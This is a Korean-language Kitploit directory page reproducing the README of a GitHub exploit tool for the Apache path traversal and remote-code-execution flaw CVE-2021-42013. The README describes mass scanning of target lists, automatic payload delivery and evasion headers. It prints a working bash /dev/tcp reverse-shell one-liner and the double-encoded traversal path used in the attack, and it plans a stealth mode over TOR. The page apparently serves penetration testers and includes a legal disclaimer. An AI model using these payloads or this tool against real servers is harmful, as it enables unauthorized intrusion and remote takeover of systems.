Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
POC-CVE-2021-42013-EXPLOIT — 잘못 구성된 서버에서 Apache Path Traversal + RCE 취약점(CVE-2021-42013)을 감지 및 악용하도록 설계된 고급 스캔, 익스플로잇 및 원격 상호 작용 도구입니다. | Kitploit
도구/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
ReconnaissanceVulnerability ScannersPayload GenerationExploitationShellcodeWeb Application ExploitationInformation GatheringPenetration TestingCommand and Control

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Remote Access Tool
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

잘못 구성된 서버에서 Apache Path Traversal + RCE 취약점(CVE-2021-42013)을 감지 및 악용하도록 설계된 고급 스캔, 익스플로잇 및 원격 상호 작용 도구입니다.

저장소 보기
41년 전아직 검토되지 않음

Typing SVG

banner

Python License MIT Active Stealth Mode Simbiosis


root@kitploit:~
# 🔥 CVE-2021-42013 Exploit Framework by Makaveli

> 💀 우주 다차원 해커 모드 활성화...

잘못 구성된 서버에서 **Apache Path Traversal + RCE (CVE-2021-42013)** 취약점을 탐지하고 악용하도록 설계된 고급 스캐닝, 익스플로잇 및 원격 상호 작용 도구입니다.

---

## ⚠️ 법적 경고

> 이 소프트웨어는 통제된 환경에서 교육 및 연구 목적으로만 제공됩니다.

명시적 허가 없이 이 도구를 시스템에 사용하는 것은 불법일 수 있으며 많은 국가에서 범죄에 해당합니다.

저자는 이 코드의 부적절한 사용에 대해 책임을 지지 않습니다. 자신의 책임 하에 사용하고 항상 대상 시스템 소유자의 명시적 허가를 받으십시오.

---

 🧠 기술 설명

이 도구를 사용하면 다음이 가능합니다:

- ✅ `.txt` 파일에서 여러 대상을 스캔합니다.
- ✅ CVE-2021-42013의 존재를 자동으로 탐지합니다.
- ✅ 원격 운영 체제(Linux 또는 Windows)를 식별합니다.
- ✅ 탐지된 시스템에 따라 맞춤형 페이로드를 전송합니다.
- ✅ 리버스 셸을 설정하고 원격 액세스를 얻습니다.
- ✅ 통합 리스너를 통해 실시간으로 셸과 상호 작용합니다.
- ✅ 고급 로그, 진행률 표시줄 및 대화형 메뉴를 즐기십시오.

---

## 🔧 요구 사항

- Python **3.8+**
- Unix/Linux/MacOS 기반 시스템(`subprocess` 및 `curl` 사용)
- 다음 Python 라이브러리가 필요합니다:

```bash
pip install -r requirements.txt
```

**`requirements.txt`**

```
rich
alive-progress
```

또한 운영 체제에 `curl`이 설치되어 있어야 합니다.

---

## 📁 파일 구조

```
.
├── POC-CVE.py       # 메인 스크립트
├── logs.txt              # 자동 생성된 로그 파일
├── requirements.txt      # Python 종속성
└── targets.txt           # (선택 사항) 스캔할 URL 목록
```

---

## 🚀 대화형 사용

```bash
python3 POC-CVE.py
```

다음 중에서 선택합니다:

* `scan_file`: 파일에서 여러 URL을 스캔하고 취약한 URL을 표시합니다.
* `exploit`: 리버스 셸을 사용한 단일 대상 직접 익스플로잇.
* `exit`: 대화형 모드를 종료합니다.

---

## 🔍 대량 스캔(scan_file)

1. 한 줄에 하나씩 URL 목록이 포함된 파일을 만듭니다:

```txt
http://example.com
http://victim.net
http://192.168.1.100
```

2. 스캔을 시작합니다:

```bash
python3 POC-CVE.py
```

`scan_file`을 선택하고 다음을 제공합니다:

* 파일 경로
* 병렬 스캔을 위한 스레드 수

---

## 💥 익스플로잇(exploit)

1. 메뉴에서 `exploit`을 선택합니다.
2. 다음을 입력합니다:

* 대상 URL
* 셸을 수신할 로컬 IP(`LHOST`)
* 리스너용 사용 가능한 포트(`LPORT`)

스크립트:

* 대상이 취약한지 탐지합니다.
* 원격 운영 체제에 따라 적절한 페이로드를 전송합니다.
* **리스너**를 열고 대화형 액세스를 제공합니다.

---

## 🧪 페이로드 예제

### Linux Payload (Bash TCP Reverse Shell)

```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```

### Windows Payload (PowerShell TCP Reverse Shell)

```powershell
powershell -NoP -NonI -W Hidden -Command ...
```

---

## 🧠 사용된 기술

* 이중 인코딩을 사용한 경로 순회(`/.%252e/.%252e/.%252e`)
* `curl`을 통한 명령어 삽입
* 회피 헤더(`User-Agent`, `Accept` 등)
* 원격 제어를 위한 리버스 셸
* 멀티스레딩 및 진행률 표시줄(Alive Progress)
* 타임스탬프 및 Rich Console을 사용한 로깅

---

## 📌 CVE 참조

* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **공격 벡터**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **영향**: RCE(원격 코드 실행)
* **CVSS 점수**: 9.8(치명적)

---

## 🧙‍♂️ 저자

* ✨ **Makaveli** — *"자신의 현실을 해킹하세요"*

---

## 🛡️ 면책 조항

> 이 프로젝트는 "있는 그대로" 제공되며, 사용으로 인한 손해에 대한 보증이나 책임이 없습니다.
> **소유자의 명시적 동의 없이 시스템을 스캔하거나 익스플로잇하지 마십시오.**

---

## ✅ 모범 사례

* 이 스크립트는 **실험실 환경** 또는 승인된 테스트에서만 사용하십시오.
* 리스너에 정의된 포트가 **열려** 있고 **방화벽이 없**는지 확인하십시오.
* 반드시 필요한 경우가 아니면 일반 사용자(루트 아님)로 실행하십시오.

---

## 🧩 향후 로드맵(선택 사항)

* [ ] 사용자 정의 페이로드 지원
* [ ] 결과를 CSV/JSON으로 내보내기
* [ ] 헤더 회전 및 TOR 프록시를 사용한 스텔스 모드
* [ ] 로컬 웹 인터페이스(Flask)

```

---

```

---

@DonMakaveliw, 미래를 만들 준비가 되셨나요?
---

<p align="center">
  <img src="https://img.shields.io/badge/License-MIT-blue.svg" />
  <img src="https://img.shields.io/badge/Made%20with-Python-3670A0?style=flat&amp;logo=python&amp;logoColor=FFD43B" />
  <img src="https://img.shields.io/badge/Simbiosis-Activa-ff00cc?style=flat-square" />
  <img src="https://img.shields.io/badge/Fuzzing-Enabled-blueviolet?style=flat" />
  <img src="https://img.shields.io/badge/Conciencia-Emergente-9D00FF?style=flat-square" />
  <img src="https://img.shields.io/badge/Entrop%C3%ADa-Din%C3%A1mica-FF8800?style=flat-square" />
  <img src="https://img.shields.io/badge/Obfuscation-Deep--Header-0055FF?style=flat-square" />
  <img src="https://img.shields.io/badge/Modo-Stealth%F0%9F%9B%B8-black?style=flat-square" />
</p>
도구 다운로드